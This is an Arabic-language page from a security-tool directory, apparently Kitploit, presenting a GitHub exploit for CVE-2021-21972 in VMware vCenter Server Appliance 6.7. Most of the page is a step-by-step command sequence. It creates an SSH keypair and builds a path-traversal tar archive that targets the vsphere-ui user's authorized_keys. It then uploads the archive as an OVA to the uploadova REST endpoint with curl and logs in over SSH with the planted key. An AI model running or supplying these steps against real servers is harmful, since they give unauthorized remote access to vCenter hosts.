Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-21972 — CVE-2021-21972 | Kitploit
أدوات/GitHubGitHub/renini/cve-2021-21972
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubrenini/cve-2021-21972

CVE-2021-21972

CVE-2021-21972

عرض المستودع
2منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-21972

CVE-2021-21972

تم اختباره ضد VMware VCSA 6.7

إنشاء زوج مفاتيح ssh

root@kitploit:~
ssh-keygen -t rsa -f vcsa.key -N ''

إنشاء tarbal مع ../../../../../home/vsphere-ui/.ssh/authorized_keys

root@kitploit:~
python2 evilarc.py -d 5 -p 'home/vsphere-ui/.ssh' -o unix -f evil.tar authorized_keys
mv evil.tar evil.ova

رفع evil.ova إلى نقطة نهاية REST الخاصة بـ vropspluginui uploadova

root@kitploit:~
curl -k -A "" --form "[email protected];type=text/plain" https://$VCSA_IP/ui/vropspluginui/rest/services/uploadova -H "Accept: application/json"

الاتصال بـ vcsa عبر ssh باستخدام المفتاح المصرح به المضاف

root@kitploit:~
ssh -i vcsa.key vsphere-ui@$VCSA_IP
تنزيل الأداة